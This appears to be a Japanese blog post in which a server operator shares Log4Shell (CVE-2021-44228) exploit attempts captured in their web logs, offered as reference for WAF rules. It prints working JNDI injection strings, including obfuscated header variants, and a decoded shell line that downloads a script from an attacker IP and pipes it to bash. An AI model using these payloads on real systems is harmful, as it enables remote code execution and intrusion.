概要
log4j の脆弱性を悪用するリクエストが自分のサーバにも来ていたので紹介します
基本は log4j を使っていなければ大丈夫ですが無駄なリクエストを弾くこともできるので WAF などに設定の参考になるかなと思います
環境
- GCP
- Ruby
- Sinatra
パス
web_1 | 167.99.44.32 - - [11/Dec/2021:19:50:33 +0000] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 6666 0.0093
web_1 | 45.155.205.233 - - [12/Dec/2021:05:27:12 +0000] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNS4yMDguMjA5LjEyMjo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMzUuMjA4LjIwOS4xMjI6NDQzKXxiYXNo} HTTP/1.1" 200 13119 0.0099
web_1 | 45.83.65.2 - - [13/Dec/2021:03:43:00 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 6666 0.0085
web_1 | 195.54.160.149 - - [17/Dec/2021:02:13:04 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNS4yMDguMjA5LjEyMjo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzUuMjA4LjIwOS4xMjI6NDQzKXxiYXNo} HTTP/1.1" 200 13119 0.0096
ちなみに base64 されていた文字列はデコードすると以下のようなシェルになっていました (注意:間違っても実行しないように)
(curl -s 45.155.205.233:5874/35.208.209.122:443||wget -q -O- 45.155.205.233:5874/35.208.209.122:443)|bash
IP はハニーポットの IP っぽいです
this log4shell payload is... a coin miner
— Kevin Beaumont (@GossiTheDog) December 10, 2021
the vulnerability has arrived pic.twitter.com/XUR7I5ydpP
ヘッダ
web_1 | I, [2021-12-17T02:13:04.435652 #1] INFO -- : {"HTTP_VERSION"=>"HTTP/1.1", "HTTP_HOST"=>"35.208.209.122:443", "HTTP_CONNECTION"=>"close", "HTTP_X_REAL_IP"=>"195.54.160.149", "HTTP_X_FORWARDED_FOR"=>"195.54.160.149", "HTTP_X_FORWARDED_PROTO"=>"https", "HTTP_X_FORWARDED_SSL"=>"on", "HTTP_X_FORWARDED_PORT"=>"443", "HTTP_USER_AGENT"=>"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNS4yMDguMjA5LjEyMjo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzUuMjA4LjIwOS4xMjI6NDQzKXxiYXNo}", "HTTP_REFERER"=>"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNS4yMDguMjA5LjEyMjo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMzUuMjA4LjIwOS4xMjI6NDQzKXxiYXNo}", "HTTP_ACCEPT_ENCODING"=>"gzip"}
UserAgent, Referer に base64 化されたスクリプトが仕込まれていました
0 件のコメント:
コメントを投稿